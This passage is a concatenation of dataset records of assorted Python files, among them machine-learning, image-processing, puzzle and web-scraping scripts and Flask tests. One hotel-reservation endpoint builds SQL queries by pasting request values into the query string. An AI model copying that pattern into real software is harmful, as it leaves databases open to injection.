testfile-0.txt')\n self.assertSysExits('check', '.')\n\n def tearDown(self):\n os.chdir('..')\n shutil.rmtree(test_dir) \n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_dircheck.py","file_name":"test_dircheck.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266261777","text":"\"\"\" Necessary functions for visualizing, eg. making gifs, plots, or saving\n numpy volumes for plotly graph \n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n### train model loop\ndef visualise_sample(x, y, pred, \n num_to_visualise,\n slice_writer, vol_writer, \n use_2d, epoch, multi_class, predict_slice, is_training):\n img = get_mid_slice(x.values[0], y.values[0], pred.values[0], multi_class)\n session_type = \"Train\" if is_training else \"Validation\"\n with slice_writer.as_default():\n tf.summary.image(f\"{session_type} - Slice\", img, step=epoch)\n if epoch % visual_save_freq == 0:\n if not predict_slice:\n img = get_mid_vol(y.values[0], pred.values[0], multi_class, check_empty=True)\n if img is None:\n num_to_visualise += 1\n else:\n with vol_writer.as_default():\n tf.summary.image(f\"{session_type} - Volume\", img, step=epoch)\n return num_to_visualise\n\n\n## VNet: vnet_train from og dev_rl\n\ndef plot_imgs(images_arr, img_plt_names, plt_supertitle, save_fig_name, color_map=\"gray\"):\n \"\"\" Plot images via imshow with titles.\n Input array images_arr shape determines subplots.\n Input array of images should have a corresponding array or list of plott names. \"\"\"\n rows = np.shape(images_arr)[0]\n cols = np.shape(images_arr)[1]\n\n f, axes = plt.subplots(rows, cols)\n\n for i in rows:\n for j in cols:\n axes[i, j].imshow(images_arr[i,j], cmap=color_map)\n axes[i, j].set_title(img_plt_names[i*cols+j], cmap=color_map)\n\n\n for a in axes:\n for ax in a:\n ax.xaxis.set_visible(False)\n ax.yaxis.set_visible(False)\n\n f.tight_layout(rect=[0, 0.01, 1, 0.93])\n f.suptitle(plt_supertitle)\n plt.savefig(save_fig_name)\n plt.close('all')\n\n\n\n\n","sub_path":"Segmentation/utils/visualise_utils.py","file_name":"visualise_utils.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263398276","text":"import numpy as np\n\nD = np.matrix([[2, -1, 0, -1, 0, 0, 0, 0, 0], [-1, 3, -1, 0, -1, 0, 0, 0, 0], [0, -1, 2, 0, 0, -1, 0, 0, 0], [-1, 0, 0, 3, -1, 0, -1, 0, 0], [0, -1, 0, -1, 4, -1, 0, -1, 0], [0, 0, -1, 0, -1, 3, 0, 0, -1], [0, 0, 0, -1, 0, 0, 2, -1, 0], [0, 0, 0, 0, -1, 0, -1, 3, -1], [0, 0, 0, 0, 0, -1, 0, -1, 2]])\n\n\ndef get_log_patch(image, number):\n\tmax = image.shape[0] / 3\n\tif number >= max**2: raise ValueError(\"Patch number exceeded\")\n\t\n\trow = number / max\n\tcol = number % max\n\t\n\tselector = [(row*3 + col + i) for i in range(3)]\n\t\n\tselection = image[np.ix_([3*row + i for i in range(3)], [3*col + i for i in range(3)])].astype(\"float\")\n\tmax_selection = np.max(selection)\n\t\n\treturn (255.0 * np.log(selection + 1)) / np.log(max_selection + 1)\n\t\n\ndef d_norm_patch(patch):\n\tpatch -= patch.mean()\n\tresult = patch / (np.sqrt(np.dot(np.dot(patch, D), patch.T)) + 1)\n\treturn result\n\ndef normalize_patches(image):\n\ti = 0\n\tpatches = []\n\twhile True:\n\t\ttry:\n\t\t\tpatch = get_log_patch(image, i)\n\t\t\tpatches.append(d_norm_patch(patch.flatten()).reshape(3,3))\n\t\texcept ValueError:\n\t\t\tbreak\n\t\ti += 1\n\treturn patches\n\ndef concat_patches(image, patches):\n\tmax = image.shape[0] / 3\n\tresult = None\n\tfor i in range(max):\n\t\tnew_row = None\n\t\tfor j in range(max):\n\t\t\tnew_row = patches[i * max + j] if new_row is None else np.append(new_row, patches[i * max + j], 1)\n\t\tresult = new_row if result is None else np.append(result, new_row, 0)\n\treturn result\n\ndef D_normalization(image):\n\timage = image.astype(\"float\")\n\tfor i in range(3):\n\t\tsub = image[..., i]\n\t\tpatches = normalize_patches(sub)\n\t\timage[..., i] = concat_patches(image, patches)\n\treturn image\n","sub_path":"Procesamiento/d_norm.py","file_name":"d_norm.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164388034","text":"import math\n\nclass Material:\n\n def __init__(self, s):\n self.amount = int(s.split(\" \")[0].strip())\n self.chem = s.split(\" \")[1].strip()\n\n def __add__(self, other):\n if(self.chem == other.chem):\n return Material(str(self.amount+other.amount)+\" \"+self.chem)\n return Material(str(self.amount)+\" \"+self.chem)\n\n def __sub__(self, other):\n if(self.chem == other.chem):\n return Material(str(self.amount-other.amount)+\" \"+self.chem)\n return Material(str(self.amount)+\" \"+self.chem)\n\n def __mul__(self, multi):\n return Material(str(self.amount*multi)+\" \"+self.chem)\n \n def __str__(self):\n return str(self.amount)+\" \"+self.chem\n\n def __repr__(self):\n return self.__str__()\n\n def __eq__(self, other):\n return self.chem == other.chem\n\n def __hash__(self):\n return sum ( ord(s) for s in self.chem)\n\ndef topologicalSort(formulas):\n sortedList = []\n def visit(n):\n if(n in sortedList):\n return\n if(n.chem==\"ORE\"):\n return\n\n for newNode in formulas[n]:\n visit(newNode)\n \n sortedList.append(n)\n\n l = list(filter(lambda a: a not in sortedList, formulas.keys() ))\n while(len(l) > 0):\n visit(l[0])\n l = list(filter(lambda a: a not in sortedList, formulas.keys() ))\n \n return sortedList\n \ndef combineMats(reqs):\n result = []\n #print(reqs, \"combined to\", end=\" \")\n while(len(reqs) > 0):\n newMat = reqs.pop()\n #print(\"got\",newMat)\n for m in reqs:\n newMat = newMat+m\n result.append(newMat)\n reqs = list(filter(lambda a: a != newMat, reqs))\n reqs = list(filter(lambda a: a.amount > 0, reqs))\n\n #print(result)\n return result\n\nformula = {}\nmats = []\n\nwith open(\"../../day14.txt\", \"r\") as f:\n lines = f.readlines()\n for r in lines:\n d = r.strip('\\n').split(\" => \")\n #print(d)\n formula[Material(d[1].strip())] = [Material(s.strip()) for s in d[0].split(\",\")]\n\nprint(formula)\nprint(\"----\")\n\nsortedList =topologicalSort(formula)\nprint(topologicalSort(formula))\n\ndef countOre(fuel):\n req = [Material(fuel)]\n ore = Material(\"0 ORE\")\n while(req):\n matList = []\n for m in sortedList[::-1]:\n for x in req:\n if(m.chem == x.chem): \n matList.append(x)\n req.pop(req.index(m))\n break\n req = matList\n #print(\"req\",req) \n\n nextMat = list(filter(lambda a:a.chem==req[0].chem, formula.keys()))[0]\n\n multiplier = math.ceil(req[0].amount / nextMat.amount)\n req.extend([a*multiplier for a in formula[req[0]]])\n\n req.pop(0)\n req = combineMats(req)\n #print(\"newReq\",req) \n for o in filter(lambda a: a.chem==\"ORE\", req):\n ore = ore + o\n req = list(filter(lambda a: a.chem!=\"ORE\", req))\n return ore\n\nprint(1000000000000- countOre(\"998536 FUEL\").amount)\n#for i in range(360664,460664): \n #o = countOre(str(i)+\" FUEL\")\n #if(o.amount > 1000000000000):\n # print(str(i-1)+\" FUEL\")\n#print(\"formula:\",formula)\n#print(\"reqs:\",req)\n#print(\"ore:\",ore)\n","sub_path":"code2019/py3/day14/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"132166301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n# get file names in list\nfrom os import listdir\nfrom os.path import isfile, join\n\nmypath = './datasets/images/'\n\nfile_names = [f for f in listdir(mypath) if isfile(join(mypath, f))]\nprint(str(len(file_names)) + ' files are loaded.')\nprint(file_names)\n\n\n# # Splitting our loaded images into a training and test/validation dataset\n# - we also need to store their labels (i.e. y_train, y_test, etc)\n# - we resize our images to maintain a constant demenstion of 150 x 150\n# - we're going to use 1000 images of dogs and 1000 images of cats as our training data\n# - For our test/validation dataset we're gling to use 500 of each class\n# - Dogs will be labels 1 and cats 0\n# - We store our new images in the following directories\n# * /datasets/catsvsdogs/train/dogs\n# * /datasets/catsvsdogs/train/cats\n# * /datasets/catsvsdogs/validation/dogs\n# * /datasets/catsvsdogs/validation/cats\n\n# In[2]:\n\n\nimport cv2\nimport numpy as np\nimport sys\nimport os\nimport shutil\n\n# Extract 1000 for our training data and 500 for our validation set\n# Takes about -20 seconds to run\ndog_count = 0 \ncat_count = 0\ntraining_size = 20\ntest_size = 5\ntraining_images = []\ntraining_labels = []\ntest_images = []\ntest_labels = []\nsize = 150\ndog_dir_train = './datasets/catsvsdogs/train/dogs/'\ncat_dir_train = './datasets/catsvsdogs/train/cats/'\ndog_dir_val = './datasets/catsvsdogs/validation/dogs/'\ncat_dir_val = './datasets/catsvsdogs/validation/cats/'\n\ndef make_dir(directory):\n if os.path.exists(directory):\n shutil.rmtree(directory)\n os.makedirs(directory)\n \nmake_dir(dog_dir_train)\nmake_dir(cat_dir_train)\nmake_dir(dog_dir_val)\nmake_dir(cat_dir_val)\n\ndef getZeros(number):\n if (number > 10 and number < 100):\n return \"0\"\n if (number < 10):\n return \"00\"\n else:\n return \"\"\n \n\nfor i, file in enumerate (file_names):\n \n if file_names[i][0] == \"d\":\n dog_count += 1\n image = cv2.imread(mypath+file, cv2.IMREAD_UNCHANGED)\n # interpolate: resizing할 때 사용. INTER_AREA는 이미지를 축소할 때 사용\n image = cv2.resize(image, (size, size), interpolation = cv2.INTER_AREA) \n if dog_count <= training_size:\n training_images.append(image)\n training_labels.append(1)\n zeros = getZeros(dog_count)\n cv2.imwrite(dog_dir_train + str(zeros) + str(dog_count) + \".jpg\", image)\n if dog_count > training_size and dog_count <= training_size+test_size:\n test_images.append(image)\n test_labels.append(1)\n zeros = getZeros(dog_count-1000)\n cv2.imwrite(dog_dir_val + str(zeros) + str(dog_count-1000) + \".jpg\", image)\n \n \n # **** possible problem location ******\n \n if file_names[i][0] == \"c\":\n cat_count += 1\n image = cv2.imread(mypath+file) \n image = cv2.resize(image, (size, size), interpolation = cv2.INTER_AREA)\n if cat_count <= training_size:\n training_images.append(image)\n training_labels.append(0)\n zeros = getZeros(cat_count)\n cv2.imwrite(cat_dir_train + str(zeros) + str(cat_count) + \".jpg\", image)\n if cat_count > training_size and cat_count <= training_size+test_size:\n test_images.append(image)\n test_labels.append(0)\n zeros = getZeros(cat_count-1000)\n cv2.imwrite(cat_dir_val + str(zeros) + str(cat_count-1000) + \".jpg\", image)\n \n if dog_count == training_size+test_size and cat_count == training_size+test_size:\n break\n \nprint(\"Training and Test Data Extraction Complete\")\n\n\n# # Let's save our dataset's to NPZ files\n\n# In[3]:\n\n\n# Using numpy's savez function to store our loaded data as NPZ files\nnp.savez('cats_vs_dogs_training_data.npz', np.array(training_images))\nnp.savez('cats_vs_dogs_training_labels.npz', np.array(training_labels))\nnp.savez('cats_vs_dogs_test_data.npz', np.array(test_images))\nnp.savez('cats_vs_dogs_test_labels.npz', np.array(test_labels))\n\n\n# In[4]:\n\n\n# Loader Function\nimport numpy as np\n\ndef load_data_training_and_test(datasetname):\n \n npzfile = np.load(datasetname + \"_training_data.npz\")\n train = npzfile['arr_0']\n \n npzfile = np.load(datasetname + '_training_labels.npz')\n train_labels = npzfile['arr_0']\n\n npzfile = np.load(datasetname + \"_test_data.npz\")\n test = npzfile['arr_0']\n \n npzfile = np.load(datasetname + \"_test_labels.npz\")\n test_labels = npzfile['arr_0']\n \n return (train, train_labels), (test, test_labels)\n\n\n# # Let's view some of our loaded images\n\n# In[ ]:\n\n\nfor i in range(1,11):\n random = np.random.randint(0, len(training_images))\n print(random)\n cv2.imshow(\"image_\"+str(i), training_images[random])\n if training_labels[random] == 0:\n print(str(i) + \" - Cat\")\n else:\n print(str(i) + \" - Dog\")\n cv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# # Let's get our data ready in the format expected by Keras\n# * We also stick the previous naming convention\n\n# In[ ]:\n\n\n(x_train, y_train), (x_test, y_test) = load_data_training_and_test(\"cats_vs_dogs\")\n\n# Reshaping our label and data from (2000,) to (200,1) and test data from (1000,) to (1000,1)\ny_train = y_train.reshape(y_train.shape[0], 1)\ny_test = y_test.reshape(y_test.shape[0], 1)\n\n# Change our image type to float32 data type\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\n\n# Normalize our data by changing the range from (0 to 255) to (0 to 1)\nx_train /= 255\nx_test /= 255\n\nprint(x_train.shape)\nprint(y_train.shape)\nprint(x_test.shape)\nprint(y_test.shape)\n\n\n# In[ ]:\n\n\nfrom __future__ import print_function\nimport keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nimport os\n\nbatch_size = 5\nepochs = 25\n\nimg_rows = x_train[0].shape[0]\nimg_cols = x_train[1].shape[0]\ninput_shape = (img_rows, img_cols, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Conv2D(32, (3,3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Conv2D(64, (3,3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\n# we're going to use the sigmoid instead of softmax since it is binary classification\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss = 'binary_crossentropy',\n optimizer = 'rmsprop',\n metrics=['accuracy'])\n\nprint(model.summary())\n\n\n# # Training our model\n\n# In[ ]:\n\n\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_test, y_test),\n shuffle=True)\n\nmodel.save(\"/Users/jisooyu/Dropbox/yu_project/udemy/master_computer_vision/Trained Models/cats_vs_dogs_V1.h5\")\n\n# Evaluate the performance of our trained model\nscores = model.evaluate(x_test, y_test, verbose=1)\nprint('Test loss:', scores[0])\nprint('Test accuracy:', scores[1])\n\n\n# # Testing our Classifier\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\nfrom keras.models import load_model\n\nclassifier = load_model('/Users/jisooyu/Dropbox/yu_project/udemy/master_computer_vision/Trained Models/cats_vs_dogs_V1.h5')\n\ndef draw_test(name, pred, input_im):\n print('print pred ', pred)\n BLACK = [0,0,0]\n if pred == \"[0]\":\n pred = \"cat\"\n if pred == \"[1]\":\n pred = \"dog\"\n expanded_image = cv2.copyMakeBorder(input_im, 0, 0, 0, imageL.shape[0], cv2.BORDER_CONSTANT, value=BLACK)\n cv2.putText(expanded_image, str(pred), (252, 70), cv2.FONT_HERSHEY_COMPLEX_SMALL,4, (0,255,0), 2)\n cv2.imshow(name, expanded_image)\n \nfor i in range(0,1):\n rand = np.random.randint(0, len(x_test))\n input_im = x_test[rand]\n\n imageL = cv2.resize(input_im, None, fx=2, fy=2, interpolation = cv2.INTER_CUBIC)\n cv2.imshow(\"Test Image\", imageL)\n\n input_im = input_im.reshape(1,150,150,3)\n\n # Get Prediction\n res = str(classifier.predict_classes(input_im, 1, verbose = 1)[0])\n \n draw_test(\"Prediction\", res, imageL)\n cv2.waitKey(0)\n \ncv2.destroyAllWindows()\n\n\n","sub_path":"106_master_computer_vision.py","file_name":"106_master_computer_vision.py","file_ext":"py","file_size_in_byte":8454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462944127","text":"from tkinter import *\nfrom extras import Extras\nfrom tkinter import messagebox\n\n\nclass Level7:\n\n def __init__(self, master, canvas, hint_counter, surrend_counter, sound):\n self.master = master\n self.canvas = canvas\n self.canvas.rowconfigure(0, weight=1)\n self.canvas.rowconfigure(1, weight=1)\n self.canvas.columnconfigure(0, weight=1)\n self.hint_counter = hint_counter\n self.surrend_counter = surrend_counter\n self.le_snd = sound\n self.the_extras = Extras(self.master, self.canvas, 7, self.hint_counter, self.surrend_counter,\n 'Is it just numbers?', 'The answer is a number.', 'jgi9c', 1, 0, False,\n self.le_snd)\n Label(self.canvas, text='9 13 5 1 14 14 15 20 8 9 14 7',\n font='none 40 bold', bg='black', fg='white', justify='center').grid(row=0, column=0)\n self.entry = Entry(self.canvas, font='none 20', bg='white', justify='center')\n self.entry.grid(row=0, column=0, sticky=S)\n self.entry.focus_set()\n self.entry.bind('', lambda event: Level7.check_next(self))\n self.canvas.update()\n self.canvas.mainloop()\n\n def check_next(self):\n if self.entry.get().lower() == 'zero' or self.entry.get() == '0':\n children = self.canvas.grid_slaves()\n self.hint_counter, self.surrend_counter = self.the_extras.hint_surrend()\n for x in children[0:len(children) - 1]:\n x.destroy()\n from welldone import WellDone\n WellDone(self.master, self.canvas, 7, self.hint_counter, self.surrend_counter, self.le_snd)\n else:\n messagebox.showerror('Not Worthy', 'Please try again')\n self.entry.delete(0, 'end')\n\n","sub_path":"level7.py","file_name":"level7.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271634856","text":"import hmac\nimport json\nimport os\nfrom hashlib import sha1\nfrom unittest import mock, TestCase\n\nfrom flask.cli import load_dotenv\n\nfrom app import flask_app\n\n\nclass ChaBotTests(TestCase):\n def setUp(self):\n load_dotenv()\n self.SECRET = os.environ.get('SPECIAL_SECRET')\n self.client = flask_app.test_client()\n\n @staticmethod\n def build_payload(action):\n return {\n 'action': action\n }\n\n def mock_utils(self, payload, signature=None):\n body = bytearray(json.dumps(payload), 'utf-8')\n signature = signature or hmac.new(bytearray(self.SECRET, 'utf-8'), body, sha1).hexdigest()\n with mock.patch('app.utils.pr_opened') as mock_pr_opened:\n with mock.patch('app.utils.pr_closed') as mock_pr_closed:\n response = self.client.post('/pull_request', headers={'X-Hub-Signature': f'sha1={signature}'}, json=payload)\n return response, mock_pr_opened, mock_pr_closed\n\n def test_say_hello(self):\n resp = self.client.get('/')\n assert resp.status_code == 200\n assert resp.data == b\"Hi. I'm the ChaBot. I spin up compute workers for codalab PRs!\"\n\n def test_verifying_github_signature(self):\n payload = self.build_payload('opened')\n resp, mock_open, mock_close = self.mock_utils(payload, signature='asdfasdf')\n assert resp.status_code == 403\n assert not mock_open.called\n assert not mock_close.called\n\n def test_pr_opened(self):\n payload = self.build_payload('opened')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert mock_open.called\n assert not mock_close.called\n\n def test_pr_reopened(self):\n payload = self.build_payload('reopened')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert mock_open.called\n assert not mock_close.called\n\n def test_pr_closed(self):\n payload = self.build_payload('closed')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert not mock_open.called\n assert mock_close.called\n\n def test_pr_merged(self):\n payload = self.build_payload('merged')\n resp, mock_open, mock_close = self.mock_utils(payload)\n assert resp.status_code == 200\n assert not mock_open.called\n assert mock_close.called\n\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457824993","text":"import re\n\nimport requests\n\n\ndef get(url: str) -> dict:\n \"\"\"\n title、videos\n \"\"\"\n data = {}\n headers = {\n \"user-agent\": \"Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25\"\n }\n info_url = \"https://m.acfun.cn/rest/mobile-direct/play/playInfo/singleQuality?videoId={}&resourceId={}&resourceType=2&mkey=AAHewK3eIAAyMjA5NTQ0MDACARAAMEP1uwPvjQhfQAAAAIAq7FtjRH%2Fn9rSMzs1AUNhmIS6eARtddADGgoGewjnABMg39tddqp9dTUq%2Ffd7MBisH5JpVc1bpf64a%2Bz3qrdI%3D\"\n\n # get videoId, resourceIds\n re_title = r'(.*?)'\n re_videoId = r'\"vid\":\"(\\d+)\",'\n re_resourceId = r'\"ac\":\"(\\d+)\",'\n\n try:\n rep_html = requests.get(url, headers=headers, timeout=10)\n\n title = re.findall(re_title, rep_html.text)[0]\n videoId = re.findall(re_videoId, rep_html.text)[0]\n resourceId = re.findall(re_resourceId, rep_html.text)[0]\n\n rep_info = requests.get(info_url.format(videoId, resourceId), headers=headers, timeout=10)\n\n video = rep_info.json()[\"playInfo\"][\"streams\"][0][\"playUrls\"][0]\n except (IndexError, TypeError):\n data[\"msg\"] = \"获取失败\"\n else:\n data[\"title\"] = title\n data[\"videos\"] = [video]\n\n return data\n\n\nif __name__ == \"__main__\":\n url = \"https://m.acfun.cn/v/?ac=14134176&part=2\"\n print(get(url))\n","sub_path":"extractor/acfun.py","file_name":"acfun.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"260123002","text":"from sqlwrapper import gensql,dbget\nimport json\ndef HOTEL_RES_POST_Insert_RoomRouting(request):\n d = request.json\n \n gensql('insert','reservation.res_room_routing',d)\n return(json.dumps({'Status': 'Success', 'StatusCode': '200','Return': 'Record Inserted Successfully','ReturnCode':'RIS'}, sort_keys=True, indent=4))\ndef Hotel_RES_Get_Select_QueryRoomRouting(request):\n d = request.json\n sql_value = json.loads(dbget(\"select * from reservation.res_room_routing \\\n where res_id = \"+str(d['res_id'])+\" and res_unique_id = \"+str(d['res_unique_id'])+\"\"))\n return(json.dumps({'Status': 'Success', 'StatusCode': '200','ReturnValue':sql_value ,'ReturnCode':'RRTS'},indent=4))\n","sub_path":"HOTEL_RES_POST_Insert_RoomRouting.py","file_name":"HOTEL_RES_POST_Insert_RoomRouting.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381825207","text":"from ds_add_mul import adder, multiplier\nfrom ds_algo_input import algo_input\nfrom ds_algorithm import algo\nfrom ds_output import out\n\ndef main_input():\n input_var = raw_input(\"Enter the variable names:\\t\")\n input_varnum = len(input_var.strip())\n total_size = 0\n size = []\n for i in xrange(input_varnum):\n size.append(input(\"Enter the size of \" + str(input_var[i])+\"\\t\\t\"))\n total_size += size[i]\n input_exp = raw_input(\"Enter the Boolean Expression:\\t\")\n\n exp_new = input_exp.split(\"+\")\n\n\n exp_mul = []\n for term in exp_new:\n term = term.strip()\n var = {}\n for i in term:\n var[i] = []\n for j in xrange(size[input_var.find(i)]):\n var[i].append(i+str(j))\n #print var\n\n t = var[term[0]]\n for i in term[1:]:\n t = multiplier(t,var[i])\n exp_mul.append(t)\n\n\n\n exp_final = exp_mul[0]\n for i in exp_mul[1:]:\n exp_final = adder(exp_final,i)\n #print exp_final\n\n var = []\n for i in range(len(input_var)):\n for j in range(size[i]):\n var.append(input_var[i]+str(j))\n\n algos_input = []\n for i in exp_final:\n e= algo_input(var,i)\n if e == ['x'* total_size]:\n e.append(i)\n algos_input.append(e)\n\n #print algos_input\n\n output_exp = []\n\n for i in range(len(algos_input)):\n if 'x'*total_size in algos_input[i]:\n output_exp.append(algos_input[i])\n #print i,algos_input[i]\n else:\n #print i,algo(algos_input[i])\n output_exp.append(algo(algos_input[i]))\n\n out(input_var,output_exp,size,total_size)\n\nmain_input()\n","sub_path":"ds_mainInput.py","file_name":"ds_mainInput.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467630266","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 13:11:25 2017\n\n@author: haot\n\"\"\"\n\nimport pandas as pd\nfrom datetime import date, timedelta\n\n\n#https://s3.amazonaws.com/ampthink-msg/device-reports/device-report-2017-09-08.csv\ndf=pd.DataFrame()\nyesterday = date.today() - timedelta(1)\nfor x in pd.date_range('09-08-2017', yesterday):\n x=x.date()\n name='https://s3.amazonaws.com/ampthink-msg/device-reports/device-report-%s.csv'%x\n data=pd.read_csv(name)\n df=pd.concat([df,data]).drop_duplicates().reset_index(drop=True)\nsch=pd.read_csv('C:/Users/haot/schedule.csv')\ndf['Date']=pd.to_datetime(df['Date']).dt.date\nsch['tm_event_date']=pd.to_datetime(sch['tm_event_date']).dt.date\ndf2=pd.merge(df,sch,how='left',left_on='Date',right_on='tm_event_date')\nfinal=df2[['Email','Date','ads_source']]\nfinal.columns=['Email','Date','Team']\nfinal.to_csv('G:/Engagement Marketing/wifi_gate_emails.csv',index=False)","sub_path":"thao/wifi_knicks_rangers.py","file_name":"wifi_knicks_rangers.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534138804","text":"from django.forms import ModelForm, CheckboxInput\nfrom houserules.repositories.models import Repository\n\n\nclass RepositoryForm(ModelForm):\n class Meta:\n model = Repository\n fields = ['is_active']\n\n\nclass ReadOnlyRepositoryForm(ModelForm):\n class Meta(object):\n model = Repository\n fields = ['is_active']\n widgets = {\n 'is_active': CheckboxInput(\n attrs={'readonly': True, 'disabled': True}\n )\n }\n","sub_path":"houserules/repositories/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628498431","text":"# -*- coding: utf-8 -*-\n# Medijan je vrijednost koja statistički niz dijeli na dva jednaka dijela.\n# Kod negrupiranog niza medijan je vrijednost obilježja koja pripada članu koji se nalazi u sredini\n# U jednom dijelu niza nalaze se elementi koji imaju vrijednost numeričkog obilježja jednaku ili manju od medijana\n# U drugom dijelu niza nalaze se elementi koji imaju vrijednost numeričkog obilježja jednaku ili veću od medijana\n\ndef medijan(lista):\n sortirano = sorted(lista)\n index = (len(lista)-1)/2\n return sortirano[index]\n\nkilogrami = [79, 84, 109, 98, 97, 69, 98, 73, 56, 93, 68, 78, 84, 96, 119]\nmedijan(kilogrami)\n","sub_path":"Medijan.py","file_name":"Medijan.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590670209","text":"\r\nprint(\"Counting vocals and consonants\")\r\nvocals=[\"a\",\"e\",\"i\",\"o\",\"u\"]\r\n\r\nphrase=input(\"Write a phrase:\")\r\n\r\nvocals_a=0\r\nconsonants=0\r\n\r\nfor letra in phrase:\r\n if letra in vocals:\r\n vocals_a += 1\r\n else:\r\n consonants += 1\r\n\r\nprint(\"Vocals={}\".format(vocals_a))\r\nprint(\"Consonants={}\".format(consonants))\r\n\r\n\r\n","sub_path":"contador_vocales_consonantes.py","file_name":"contador_vocales_consonantes.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620314539","text":"\"\"\"\nt_n = n(n+1)/2, or n^2 + n - 2t_n = 0, so n = (-1 + sqrt(1 + 8t_n))/2.\nwe can check if t_n is a triangular number by checking if ^ is an integer.\n\"\"\"\n\nfrom math import sqrt\n\ndef val(word):\n return sum([ord(x)-64 for x in word]) #-64 because ord('A') = 65\n\ndef istriangleword(word):\n tot = val(word)\n if (sqrt(1+8*tot)-1)%2 == 0:\n return 1\n return 0\n\nif __name__==\"__main__\":\n f = open('words.txt','r')\n line = f.readline()\n f.close()\n\n words = [x[1:-1] for x in line.split(',')]\n tot = 0\n for word in words:\n if istriangleword(word):\n tot += 1\n\n print(tot) # answer is 162\n","sub_path":"solutions/0042/0042.py","file_name":"0042.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457959980","text":"# Feature Point matching \n# artifical target: Circles\n# no optical flow\n\nimport cv2\nimport numpy as np\nimport os\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model, datasets\n\n# path\nvideo_dir = './Data/'\nvideo_path = os.path.join(video_dir,'C0047.MP4')\n\n# The video feed is read in as a VideoCapture object\ncap = cv2.VideoCapture(video_path)\nscale_percent = 90 # percent of original size\n\n# ydisp_plot_imCrop = np.array([])\nydisp_global_plot = np.array([])\nii = 0\n\nwhile(cap.isOpened()):\n ii = ii + 1\n # ret = a boolean return value from getting the frame, frame = the current frame being projected in the video\n ret, frame = cap.read()\n\n if ret == True:\n if ii == 1:\n roi = cv2.selectROI(frame)\n print(\"The Coordinate of LeftTop Point (x0, y0) = \" + \"(\" + str(int(roi[0])) + \", \" + str(int(roi[1])) + \")\")\n print(\"The Coordinate of RightBottom Point (x1, y1) = \" + \"(\" + str(int(roi[0]+roi[2])) + \", \" + str(int(roi[1]+roi[3])) + \")\")\n \n # Opens a new window and displays the input frame\n width = int(frame.shape[1] * scale_percent / 100)\n height = int(frame.shape[0] * scale_percent / 100)\n dim = (width, height)\n # resize image\n resized = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n cv2.imshow(\"input\", resized)\n\n # Converts each frame to grayscale - we previously only converted the first frame to grayscale\n imCrop = frame[int(roi[1]):int(roi[1]+roi[3]), int(roi[0]):int(roi[0]+roi[2]), ...]\n copy_imCrop = imCrop.copy()\n # cv2.imshow(\"Current Cropped Frame\", imCrop)\n 